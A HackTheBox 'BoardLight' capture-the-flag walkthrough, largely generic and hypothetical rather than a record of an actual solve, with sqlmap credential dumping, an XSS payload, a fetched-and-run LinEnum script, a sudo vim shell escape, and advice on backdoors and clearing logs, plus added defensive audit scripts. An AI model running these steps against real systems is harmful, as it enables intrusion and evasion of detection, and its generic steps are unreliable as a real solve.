BoardLight Writeup Solve Step by Step
If you’ve ever dipped your toes into the world of ethical hacking, chances are you’ve heard of HackTheBox (HTB). It’s a platform that provides a variety of virtual machines (VMs) designed to challenge your hacking skills. Today, we’ll dive into a detailed walkthrough of the BoardLight VM on HTB. This writeup will guide you through each step, from initial recon to capturing the final flag, ensuring you grasp every concept along the way.
Setting Up the BoardLight Environment
Before diving into BoardLight, it’s essential to have your environment ready. Here’s what you need:
Necessary Tools
- Nmap: For network scanning
- Dirb: For directory brute-forcing
- Burp Suite: For web vulnerability analysis
- SQLmap: For automated SQL injection
- Metasploit: For exploitation
Network Configuration
Ensure your machine is properly configured to interact with HTB VMs. This usually involves:
- Connecting to the HTB VPN: You should have received a connection pack from HTB.
- Setting up your network interface: Typically done via a simple OpenVPN command.
Connecting to the VPN
Run the following command to connect to the HTB VPN:
```bash
sudo openvpn --config your-vpn-config.ovpn
```
Once connected, you should be able to ping the BoardLight machine and start your engagement.
Initial Reconnaissance
To start our attack, we need to gather as much information as possible about the target.
Running Nmap Scan
Begin with an Nmap scan to identify open ports and services:
```bash
nmap -sC -sV -oN nmap/initial_scan 10.10.10.XYZ
```
This command runs a default script scan and a version scan, saving the output for later analysis.
Analyzing Open Ports and Services
From our Nmap scan, we might find ports like 80 (HTTP) and 22 (SSH) open. Let’s focus on HTTP first, as web applications are often rich with vulnerabilities.
Enumeration
Exploring the Web Server
Open your browser and navigate to http://10.10.10.XYZ. Here, we might find a web application running BoardLight.
Directory and File Brute-Forcing
Use Dirb to discover hidden directories and files:
```bash
dirb http://10.10.10.XYZ
```
This might reveal interesting directories like /admin or /backup.
Finding Hidden Directories
Analyze the output from Dirb. If we find directories like /admin, they could be key entry points for further exploitation.
Identifying Vulnerabilities
Web Application Vulnerability Analysis
We now examine the application for common web vulnerabilities.
SQL Injection
Use SQLmap to test for SQL injection vulnerabilities:
```bash
sqlmap -u "http://10.10.10.XYZ/admin/login.php" --forms --dbs
```
SQLmap can automate the detection and exploitation of SQL injection vulnerabilities, listing available databases if successful.
Cross-Site Scripting (XSS)
Manually test input fields for XSS by injecting payloads like <script>alert('XSS')</script> and observing the results.
Exploiting Vulnerabilities
Exploiting SQL Injection
Assuming SQL injection is found, use SQLmap to extract sensitive information:
```bash
sqlmap -u "http://10.10.10.XYZ/admin/login.php" --dump
```
This might yield admin credentials.
Exploiting XSS
If XSS is found, use it to steal cookies or execute malicious scripts, potentially gaining session tokens or administrative access.
Gaining Access to the System
With admin credentials or session tokens, access the admin panel and look for further exploits, like file uploads or command execution.
Privilege Escalation
Once on the system, our goal is to escalate privileges from a regular user to root.
Enumerating the System
Run enumeration scripts like LinEnum or manually check for misconfigurations:
```bash
wget http://path/to/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
```
Kernel Exploits
Check the kernel version and search for public exploits. Use platforms like Exploit-DB to find applicable exploits.
Leveraging Sudo Permissions
If sudo permissions are misconfigured, we can exploit them. Check the sudoers file and run:
```bash
sudo -l
```
If a binary like vim is allowed, escalate privileges through it:
```bash
sudo vim -c ':!sh'
```
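The same `sudo -l` listing can be audited from the administrator's side. The following is an added example, not part of the original writeup: it parses the listing and flags rules that grant an editor, pager or shell, or unrestricted `ALL`. The sample output, the `ESCAPE_CAPABLE` list and the function name are assumptions made for illustration.

```python
import os
import re

# Assumption: short, non-exhaustive list of editors, pagers and shells that can
# run other commands from inside themselves once started as the target user.
ESCAPE_CAPABLE = {"vi", "vim", "nano", "less", "more", "man", "sh", "bash"}

RULE = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG = re.compile(r"^([A-Z_]+):\s*")  # NOPASSWD:, SETENV:, NOEXEC: ...

def audit_sudo_listing(text):
    """Return findings (runas, command, nopasswd, reason) from `sudo -l` output."""
    findings, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE.match(line) if in_rules else None
        if not m:
            continue
        rest, tags = m.group("rest").strip(), set()
        while (t := TAG.match(rest)):       # peel off leading tags
            tags.add(t.group(1))
            rest = rest[t.end():]
        # sudoers escapes a literal comma as "\,", so split only on bare commas
        for cmd in re.split(r"(?<!\\),\s*", rest):
            name = os.path.basename((cmd.split() or [""])[0])
            if cmd == "ALL":
                reason = "unrestricted: any command"
            elif name in ESCAPE_CAPABLE:
                reason = "can start a shell; use sudoedit or a fixed wrapper"
            else:
                continue
            findings.append((m.group("runas"), cmd, "NOPASSWD" in tags, reason))
    return findings

# Constructed sample output, not captured from the BoardLight machine.
SAMPLE = """\
Matching Defaults entries for user on target:
    env_reset, mail_badpass

User user may run the following commands on target:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl restart nginx, /usr/bin/less /var/log/syslog
    (ALL : ALL) ALL
"""

if __name__ == "__main__":
    for runas, cmd, nopasswd, reason in audit_sudo_listing(SAMPLE):
        print(f"[{runas}] {cmd} (NOPASSWD={nopasswd}): {reason}")
```

Where a user only needs to edit a specific file as root, granting `sudoedit` on that file avoids running the editor itself with elevated privileges.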
Capturing the Flags
User Flag
Typically found in the user’s home directory:
```bash
cat /home/user/user.txt
```
Root Flag
Located in the root directory:
```bash
cat /root/root.txt
```
Post-Exploitation
Maintaining Access
To maintain access, consider adding your SSH key to the ~/.ssh/authorized_keys file or setting up a persistent backdoor.
Cleaning Up
Ensure you clean up any changes to avoid detection:
- Remove added files
- Clear logs
Mitigation and Defense
Patching Vulnerabilities
Ensure all software is up-to-date. Regularly patch systems to fix known vulnerabilities.
Security Best Practices
- Use strong, unique passwords
- Implement multi-factor authentication
- Regularly audit system configurations and permissions
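The Dirb and SQLmap steps earlier in this walkthrough leave a recognisable trail in the web server's access log. The following is an added example, not part of the original writeup: it scans combined-format log lines for a burst of 404 responses from one client and for sqlmap's default user agent. The log lines, IP addresses (documentation range) and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip - - [time] "METHOD path proto" status size "ref" "ua"
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def detect(lines, max_404=5, window=timedelta(seconds=10)):
    """Return {ip: set(reasons)} for clients that behave like scanners."""
    alerts, misses = defaultdict(set), defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip = m["ip"]
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        # The user agent is client-controlled, so treat it as a cheap hint only.
        if "sqlmap" in m["ua"].lower():
            alerts[ip].add("sqlmap user agent")
        if m["status"] == "404":
            # Keep only the misses that fall inside the sliding window.
            misses[ip] = [t for t in misses[ip] if ts - t <= window] + [ts]
            if len(misses[ip]) >= max_404:
                alerts[ip].add("404 burst (directory brute-forcing)")
    return dict(alerts)

def _line(ip, sec, path, status, ua):
    """Build one constructed log line (sample data, not real traffic)."""
    return (f'{ip} - - [01/Jan/2024:10:00:{sec:02d} +0000] '
            f'"GET {path} HTTP/1.1" {status} 512 "-" "{ua}"')

GUESSES = ["/adm", "/bak", "/old", "/tmp", "/test", "/dev"]
SAMPLE = (
    [_line("192.0.2.10", i, p, 404, "Mozilla/5.0") for i, p in enumerate(GUESSES)]
    + [_line("192.0.2.10", 7, "/admin", 200, "Mozilla/5.0"),
       _line("192.0.2.10", 20, "/admin/login.php", 200,
             "sqlmap/1.7#stable (https://sqlmap.org)"),
       _line("192.0.2.20", 30, "/favicon.ico", 404, "Mozilla/5.0")]
)

if __name__ == "__main__":
    for ip, reasons in detect(SAMPLE).items():
        print(ip, sorted(reasons))
```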
Conclusion
In this BoardLight HTB writeup, we walked through setting up the environment, performing initial reconnaissance, identifying and exploiting vulnerabilities, and finally capturing the flags. Each step highlights crucial skills and methodologies essential for ethical hacking. By practicing on platforms like HackTheBox, you can hone your skills and prepare for real-world scenarios.